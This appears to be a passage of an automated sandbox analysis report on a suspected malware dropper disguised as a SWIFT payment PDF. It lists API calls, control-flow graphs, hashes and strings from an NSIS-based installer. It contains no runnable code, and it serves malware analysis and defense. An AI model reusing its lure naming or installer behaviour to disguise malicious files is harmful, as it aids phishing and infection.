                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\udskriftskartotek\chiromancy\refalling$Call$Control Panel\Desktop\ResourceLocale$Epicurize Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 914957316-237657829
                                      • Opcode ID: c7dc5bc517227d642f1141329839a7512a010cb895aab6e766c5c3cb5a21175c
                                      • Instruction ID: b0afc0e10dc8cbe2448bed9474bc03f366f348945261fe302a10aac9679cd79a
                                      • Opcode Fuzzy Hash: c7dc5bc517227d642f1141329839a7512a010cb895aab6e766c5c3cb5a21175c
                                      • Instruction Fuzzy Hash: FA61E6716442007EE710BB659C85F373AACEB8275AF00857EFA45B22E2D67D6D01CB2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy,00000000,00000000,00000031), ref: 0040177E
                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy,00000000,00000000,00000031), ref: 004017A8
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll), ref: 00404EF2
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp$C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll$C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy$Call
                                      • API String ID: 1941528284-3433089771
                                      • Opcode ID: d3d96636bbead949d86675ec5ab461d68ce1a1ddc8a825193bae02ded4fdc182
                                      • Instruction ID: df8d039fdd937f1c478db27dfce12e75bce6feb5164cf919340bcacede668491
                                      • Opcode Fuzzy Hash: d3d96636bbead949d86675ec5ab461d68ce1a1ddc8a825193bae02ded4fdc182
                                      • Instruction Fuzzy Hash: F241B771900615BACB10BBA5CC46DAF7979DF42368F20423BF525F10E2DA3C5A419A6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 604 404e84-404e99 605 404f4f-404f53 604->605 606 404e9f-404eb1 604->606 607 404eb3-404eb7 call 405b99 606->607 608 404ebc-404ec8 lstrlenA 606->608 607->608 610 404ee5-404ee9 608->610 611 404eca-404eda lstrlenA 608->611 612 404ef8-404efc 610->612 613 404eeb-404ef2 SetWindowTextA 610->613 611->605 614 404edc-404ee0 lstrcatA 611->614 615 404f42-404f44 612->615 616 404efe-404f40 SendMessageA * 3 612->616 613->612 614->610 615->605 617 404f46-404f49 615->617 616->615 617->605
                                      APIs
                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                      • lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8), ref: 00404EE0
                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll), ref: 00404EF2
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll
                                      • API String ID: 2531174081-3851766246
                                      • Opcode ID: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                      • Instruction ID: 0879e44440130bf100c4abc817e106b172b9c081b4a19821dc72f8a86b472426
                                      • Opcode Fuzzy Hash: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                      • Instruction Fuzzy Hash: E3216071900118BFDB019FA5CD849DEBFB9EB45354F14807AF904B6291C6785E40CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 618 402e6c-402e82 619 402e84 618->619 620 402e8b-402e93 618->620 619->620 621 402e95 620->621 622 402e9c-402ea1 620->622 621->622 623 402eb1-402ebe call 403072 622->623 624 402ea3-402eac call 4030a4 622->624 628 403060 623->628 629 402ec4-402ec8 623->629 624->623 630 403062-403063 628->630 631 403001-403003 629->631 632 402ece-402ef1 GetTickCount 629->632 635 40306b-40306f 630->635 633 403005-403008 631->633 634 40304d-403050 631->634 636 402ef7 632->636 637 403068 632->637 633->637 638 40300a 633->638 640 403052 634->640 641 403055-40305e call 403072 634->641 639 402efc-402f04 636->639 637->635 643 40300f-403015 638->643 644 402f06 639->644 645 402f09-402f12 call 403072 639->645 640->641 641->628 650 403065 641->650 647 403017 643->647 648 40301a-403023 call 403072 643->648 644->645 645->628 654 402f18-402f21 645->654 647->648 648->628 655 403025-403038 WriteFile 648->655 650->637 656 402f27-402f47 call 405f82 654->656 657 40303a-40303d 655->657 658 402ffd-402fff 655->658 662 402ff9-402ffb 656->662 663 402f4d-402f64 GetTickCount 656->663 657->658 660 40303f-403049 657->660 658->630 660->643 664 40304b 660->664 662->630 665 402f66-402f6e 663->665 666 402fa9-402fad 663->666 664->637 667 402f70-402f74 665->667 668 402f76-402fa1 MulDiv wsprintfA call 404e84 665->668 669 402fee-402ff1 666->669 670 402faf-402fb2 666->670 667->666 667->668 675 402fa6 668->675 669->639 674 402ff7 669->674 672 402fd4-402fdf 670->672 673 402fb4-402fc8 WriteFile 670->673 677 402fe2-402fe6 672->677 673->658 676 402fca-402fcd 673->676 674->637 675->666 676->658 678 402fcf-402fd2 676->678 677->656 679 402fec 677->679 678->677 679->637
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ECE
                                      • GetTickCount.KERNEL32 ref: 00402F55
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F82
                                      • wsprintfA.USER32 ref: 00402F92
                                      • WriteFile.KERNELBASE(00000000,00000000,0078F2A8,7FFFFFFF,00000000), ref: 00402FC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CountTick$FileWritewsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 4209647438-2449383134
                                      • Opcode ID: f395eb1648f388a93fc8b21f20c206b8706aa4042387daabf36aa7791f524e93
                                      • Instruction ID: abbc5e543d40cc295139a54e2e8a13b251616715b744bb5f177e15d4b263a606
                                      • Opcode Fuzzy Hash: f395eb1648f388a93fc8b21f20c206b8706aa4042387daabf36aa7791f524e93
                                      • Instruction Fuzzy Hash: B1519C7190121AABCF10DF69DA48A9E7BB8BF04355F14413BF901B72C4D3789E50DBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 680 40231a-402360 call 402afc call 402a07 * 2 RegCreateKeyExA 687 402366-40236e 680->687 688 40289c-4028ab 680->688 689 402370-40237d call 402a07 lstrlenA 687->689 690 40237e-402381 687->690 689->690 693 402391-402394 690->693 694 402383-402390 call 4029ea 690->694 698 4023a5-4023b9 RegSetValueExA 693->698 699 402396-4023a0 call 402e6c 693->699 694->693 702 4023bb 698->702 703 4023be-402494 RegCloseKey 698->703 699->698 702->703 703->688 705 40266d-402674 703->705 705->688
                                      APIs
                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp
                                      • API String ID: 1356686001-1065263791
                                      • Opcode ID: da0d7a498fd2405c09cfd266c61d295370a8e21e52f1f3187e4aec8230a6b6c5
                                      • Instruction ID: 496afd6724d83472fd7aeeeeb6c9636b40b67d15b6efd44fac0fbba193c6cb19
                                      • Opcode Fuzzy Hash: da0d7a498fd2405c09cfd266c61d295370a8e21e52f1f3187e4aec8230a6b6c5
                                      • Instruction Fuzzy Hash: 40116071E00208BEEB10EFB5CE89EAF7A78EB44358F10403AF905B61D1D6B85D419A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 706 4015b3-4015c6 call 402a07 call 4056bd 711 4015c8-4015e3 call 40564f CreateDirectoryA 706->711 712 40160a-40160d 706->712 719 401600-401608 711->719 720 4015e5-4015f0 GetLastError 711->720 714 401638-40217f call 401423 712->714 715 40160f-40162a call 401423 call 405b77 SetCurrentDirectoryA 712->715 727 40289c-4028ab 714->727 728 40266d-402674 714->728 715->727 731 401630-401633 715->731 719->711 719->712 723 4015f2-4015fb GetFileAttributesA 720->723 724 4015fd 720->724 723->719 723->724 724->719 728->727 731->727
                                      APIs
                                        • Part of subcall function 004056BD: CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004056CB
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056D0
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056E4
                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy,00000000,00000000,000000F0), ref: 00401622
                                      Strings
                                      • C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy, xrefs: 00401617
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                      • String ID: C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy
                                      • API String ID: 3751793516-4038554312
                                      • Opcode ID: 9db9fcc5c7d74c455dd159d915d30689da6efdc5fe5d50dbc9f8e17e04e80f96
                                      • Instruction ID: be2e729169105f21f0136a8afe605fb55404e4043758c9297c14daf22ca337c6
                                      • Opcode Fuzzy Hash: 9db9fcc5c7d74c455dd159d915d30689da6efdc5fe5d50dbc9f8e17e04e80f96
                                      • Instruction Fuzzy Hash: A7114831908150ABDB213F755D04EBF77B4EE56366724073FF492B22E2C63C09429A2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 733 405854-40585e 734 40585f-40588a GetTickCount GetTempFileNameA 733->734 735 405899-40589b 734->735 736 40588c-40588e 734->736 738 405893-405896 735->738 736->734 737 405890 736->737 737->738
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405868
                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405882
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-2470672872
                                      • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                      • Instruction ID: 7032c49e779d22ef4b019cebcd704e5cdda6a64cd28d021928a5f34cef86c798
                                      • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                      • Instruction Fuzzy Hash: 21F082777082046BDB109F66DC04B9B7B9CDF95750F14C03BFE44DA180D6B499548B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 739 402a47-402a70 RegOpenKeyExA 740 402a72-402a7d 739->740 741 402adb-402adf 739->741 742 402a98-402aa8 RegEnumKeyA 740->742 743 402aaa-402abc RegCloseKey call 405ea2 742->743 744 402a7f-402a82 742->744 752 402ae2-402ae8 743->752 753 402abe-402acd 743->753 745 402a84-402a96 call 402a47 744->745 746 402acf-402ad2 RegCloseKey 744->746 745->742 745->743 748 402ad8-402ada 746->748 748->741 752->748 754 402aea-402af8 RegDeleteKeyA 752->754 753->741 754->748 755 402afa 754->755 755->741
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A68
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction ID: 1ad4598d9375e79b5c4158f8ae6fede31b6a0d7771ae0489b8e1e2a10aea7df0
                                      • Opcode Fuzzy Hash: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction Fuzzy Hash: 72116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CCE
                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD3
                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD8
                                      • GlobalFree.KERNEL32(00000000), ref: 10001785
                                      • FreeLibrary.KERNEL32(?), ref: 100017FC
                                      • GlobalFree.KERNEL32(00000000), ref: 10001821
                                        • Part of subcall function 10002165: GlobalAlloc.KERNEL32(00000040,8A470175), ref: 10002197
                                        • Part of subcall function 10002540: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2
                                        • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                        • Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(?), ref: 1000248E
                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(00000000), ref: 100024B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                      • String ID:
                                      • API String ID: 1767494692-3916222277
                                      • Opcode ID: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                      • Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
                                      • Opcode Fuzzy Hash: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                      • Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                      Strings
